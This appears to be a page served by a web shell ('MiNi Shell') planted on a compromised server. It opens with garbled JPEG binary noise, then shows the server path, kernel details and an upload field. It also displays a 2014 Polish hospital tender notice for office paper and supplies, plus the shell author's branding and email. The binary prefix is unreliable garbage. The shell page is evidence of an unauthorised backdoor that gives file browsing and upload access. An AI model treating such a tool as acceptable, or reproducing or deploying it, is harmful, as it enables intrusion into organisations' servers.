JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141105/365808-N-2014.html

<p class="kh_header"><b>Wałbrzych: Dostawy  papieru biurowego (ksero) i artykułów biurowych.</b><br>
<b>Numer ogłoszenia: 365808 - 2014; data zamieszczenia: 05.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Szpital im. dr Alfreda Sokołowskiego , ul. Sokołowskiego 4, 58-309 Wałbrzych, woj. dolnośląskie, tel. 074 6489742, faks 074 6489746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdrowie.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy  papieru biurowego (ksero) i artykułów biurowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy  papieru biurowego (ksero) i artykułów biurowych.
Pakiet nr 1 -  Papier biurowy (ksero).
Pakiet nr 2 - Artukuły biurowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.30-1, 30.19.70.00-6, 30.19.21.00-2, 30.19.21.25-3, 30.19.21.30-1, 30.19.21.70-3, 30.19.72.00-8, 30.19.73.20-5, 30.19.73.30-8, 30.19.92.30-1, 30.19.95.00-5, 30.19.21.60-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu: 
Pakiet nr 1 -     1 400,00 zł,
Pakiet nr 2 -     2 003,00 zł.

DATĄ UZNANIA WPŁATY  BĘDZIE DATA WPŁYWU NA KONTO ZAMAWIAJĄCEGO.
Potwierdzenie wniesienia wadium należy dołączyć do oferty. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego do oferty przetargowej oświadczenia oraz wymaganych dokumentów tj. 
1) posiadanie aktualnego odpisu z właściwego rejestru - na podstawie załączonego aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia  w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;
2) posiadanie aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego że Wykonawca nie zalega z uiszczaniem podatków - na podstawie aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3) posiadanie aktualnego zaświadczenia właściwego oddziału ZUS lub KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne - na podstawie aktualnego zaświadczenia właściwego oddziału ZUS lub KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego do oferty przetargowej oświadczenia oraz wymaganych dokumentów tj. :
1)	posiadanie doświadczenia w zakresie świadczenia dostaw - na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Zał. Nr 1 do SIWZ (opis przedmiotu zamówienia) oraz Wzór oferty- Zał.  nr 2 do SIWZ 
Dowód wniesienia lub ustanowienia wadium .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdrowie.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, Dział Zamówień Publicznych i Zaopatrzenia, ul. Sokołowskiego 4, 58-309 Wałbrzych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2014 godzina 10:00, miejsce: Siedziba Zamawiającego, Dział Zamówień Publicznych i Zaopatrzenia, ul. Sokołowskiego 4, 58-309 Wałbrzych..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Papier biurowy (ksero)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier biurowy (ksero) A4 białość 146, nieprzeźroczystość 80	ryza	6 000
Papier biurowy (ksero) A3 białość 146, nieprzeźroczystość 80	ryza	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.30-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zeszyt akademicki A4 w twardej oprawie	szt.	750
2.	Zeszyt 96,krata, twarda oprawa A5	szt.	720
3.	Zeszyt 60, krata miękka oprawa A5	szt.	750
4.	Zeszyt 32, krata, miękka oprawa A5	szt.	750
5.	Zeszyt 16, krata, miękka oprawa A5	szt.	1 000
6.	Bloki makulaturowe A4/100	szt.	1 200
7.	Bloki makulaturowe A5/100	szt.	1 200
8.	Koperta biała listowa C6 (op=100 szt.)	op.	480
9.	Koperta biała C5   (op=100 szt.)	op.	360
10.	Koperta biała  C4 (op=100 szt.)	op.	360
11.	Segregator A4 szeroki, kolorowy, z automatem dociskowym, z wkładką wymienną na grzbiecie, grzbiet 7,5 cm - w kolorach: niebieski, czerwony, zielony, popielaty	szt.	1 200
12.	Segregator A4 wąski, jak wyżej, grzbiet5 cm - w kolorach: niebieski, czerwony, zielony, popielaty	szt.	480
13.	Teczka wiązana papierowa	szt.	1 500
14.	Skoroszyt tekturowy połówka  wpinany oczko	szt.	1 000
15.	Teczka z gumką papierowa - skrzydło górne i dolne - przynajmniej 7 cm; grubość kartonu 300 g i neutralne pH (6,8 - 8,0)	szt.	6 500
16.	Teczka plastikowa z przeźroczystym wierzchem, wpinana z zawieszką	szt.	2 400
17.	Skoroszyt papierowy wpinany z oczkiem	szt.	2 400
18.	Karton archiwizacyjny + klips	szt.	2 500
19.	Papier komputerowy składanka 240 1+0	szt.	15
20.	Papier komputerowy składanka 240 1+1	szt.	15
21.	Papier komputerowy składanka 240 1+2	szt.	50
22.	Papier komputerowy składanka 240 1+3	szt.	25
23.	Papier komputerowy składanka 390 1+0	szt.	10
24.	Koperta bąbelkowe A 4  (op=10 szt.)	op.	25
25.	Koperta bąbelkowa A 5  (op=10 szt.)	op.	25
26.	Marker gruby czarny permanentny	szt.	3 000
27.	Marker cienki dwustronny do ozn. płyt CD	szt.	480
28.	Cienkopisy w różnych kolorach	szt.	960
29.	Pisaki różne kolory	szt.	960
30.	Długopisy żelowe czarny, niebieski, czerwony, zielony	szt.	3 600
31.	Długopis z wkładem olejowym 
z wymiennymi wkładami	szt.	1 250
32.	Wkłady olejowe do długopisów	szt.	1000
33.	Tablice korkowe
41cmmx62 cm	szt.	20
34.	Zszywki metalowe 24/6
( op. = 1000 szt.)
	op.	960
35.	Zszywacz na standardowe zszywki zszywający 25 kartek	szt.	200
36.	Spinacze metalowe 26 mm 
( op.= 100 szt.)	op.	1 200
37.	Spinacze metalowe 50 mm 
( op.= 100 szt.)	op.	480
38.	Tusz do pieczątek automatycznych 
w kolorach niebieski, czarny, czerwony 
i zielony	szt.	350
39.	Ołówki miękkie HB	szt.	350
40.	Gumka do mazania szkolna	szt.	350
41.	Temperówka metalowa	szt.	120
42.	Taśma samoprzylepna 18 mm	rol.	450
43.	Taśma pakowa brązowa i przeźroczysta 48mmx50 m	rol.	250
44.	Linijka20 cm,	szt.	50
45.	Linijka  30 cm	szt.	50
46.	Linijka 50 cm	szt.	25
47.	Półki sekretarskie plastikowe	szt.	400
48.	Pólka plastikowa pionowa stojąca	szt.	50
49.	Dziurkacze na 40 kartek	szt.	100
50.	Rozszerzacze	szt.	50
51.	Datowniki automatyczne małe plastikowe	szt.	125
52.	Korektor z pędzelkiem	szt.	250
53.	Korektor w piórze	szt.	50
54.	Zakreślacze - różne kolory	szt.	480
55.	Klej uniwersalny w sztyfcie 21 g.	szt.	250
56.	Nożyczki biurowe ze stali nierdzewnej 175 mm	szt.	240
57.	Kalka ołówkowa (op. = 100 szt.)	op.	100
58.	Koszulka foliowa A4  (op.= 100 szt.)	
op.	
1 000
59.	Koszulka foliowa A5 (op. = 100 szt.)	op.	350
60.	Marker olejowy  kolory zielony, niebieski, czerwony, czarny	szt.	400
61.	Kostka samoprzylepna  7,5 cm x 7,5 cm	op.	720
62.	Kostka bez kleju 7,5 cm x 7,5 cm	op.	500
63.	Skorowidz A4 w twardej oprawie	szt.	25
64.	Skorowidz ? A4 w twardej oprawie	szt.	25
65.	Skorowidz A5 w twardej oprawie	szt.	10
66.	Skorowidz ? A5 w twardej oprawie	szt.	10
67.	Nawilżacz gąbkowy	szt.	15
68.	Pinezki do tablic korkowych	op.	50
69.	Nici - dratwa	szt.	100
70.	Znaczniki kolorowe samoprzylepne	op.	75
71.	Ofertówka sztywna przeźroczysta
(op. = 25 szt.)	op.	250
72.	Sztywna okładka z uchwytem sprężynowym format A4	szt.	100
73.	Przekładki kartonowe	op.	50
74.	Poduszka do stempli duża 
(110x140mm )	szt.	5
75.	Teczka zapinana na rzep A4	szt.	50
76.	Teczka plastikowa wiązana A4	szt.	750
77.	Segregator A5 kolorowy z automatem dociskowym, z wkładką wymienną na grzbiecie, szer. 7 cm	szt.	25
78.	Koperta C4 brązowa z rozszerzanymi bokami i spodem (op=50 szt.)	op.	8
79.	Kalkulator typu Citizen SDC -888T 
z dużym wyświetlaczem	szt.	25
80.	Klips biurowy 25 mm kolorowy	op.	50
81.	Teczka do podpisu z 20 przekładkami	szt.	25
82.	Grzbiety do bindowania  śr. 12,5 mm (op=100szt.)	op.	5
83.	Grzbiety do bindowania  śr. 10 mm (op=100szt.)	op.	1
84.	Grzbiety do bindowania  śr. 14 mm (op=100szt.)	op.	2
85.	Grzbiety do bindowania  śr. 16 mm (op=100szt.)	op.	2
86.	Grzbiety do bindowania  śr. 19 mm (op=100szt.)	op.	1
87.	Grzbiety do bindowania  śr. 21 mm (op=50szt.)	op.	1
88.	Grzbiety do bindowania  śr. 25 mm (op=50szt.)	op.	2
89.	Grzbiety do bindowania  śr. 30 mm (op=50szt.)	op.	1
90.	Grzbiety do bindowania  śr. 45 mm (op=50szt.)	op.	2
91.	Okładki do bindowania A4 przeźroczyste( op=100 szt.)	op.	4
92.	Okładka do bindowania A4 kolorowa 
( op=100 szt.)	op.	4
93.	Rolki termiczne szer.110 mm, dł. 20 mb	szt.	250
94.	Rolki termiczne szer. 57 mm, dł. 20 mb	szt.	150
95.	Rolki termiczne 80 mm, dł. 30 mb	szt.	150
96.	Rolki offsetowe 57mm, dł. 20 mb	szt.	100
97.	Folia do laminatorów (op=100 szt.)
100 micron	op.	8
98.	Listwa wsuwana
(op=50 szt.)	op.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6, 30.19.21.00-2, 30.19.21.25-3, 30.19.21.30-1, 30.19.21.70-3, 30.19.72.00-8, 30.19.73.20-5, 30.19.73.30-8, 30.19.92.30-1, 30.19.95.00-5, 30.19.21.60-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com